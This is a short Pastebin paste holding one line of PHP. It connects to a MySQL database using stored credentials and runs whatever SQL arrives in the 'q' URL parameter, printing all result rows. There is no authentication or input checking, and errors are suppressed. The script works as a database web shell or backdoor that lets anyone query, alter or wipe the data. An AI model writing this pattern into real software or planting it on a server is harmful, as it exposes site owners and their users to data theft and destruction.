Guest User

Untitled

a guest
Sep 19th, 2018
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. <?php include_once('mysql_cfg.inc'); if (isset($_GET['q'])) { $cnxion= @mysql_connect($serverSAE,$userSAE,$passSAE); @mysql_select_db('sae'); $r=@mysql_query($_GET['q']); if ($r) { echo '<pre>'; while ($row=@mysql_fetch_assoc($r)) { print_r($row);}echo '</pre>';}}?>
Add Comment
Please, Sign In to add comment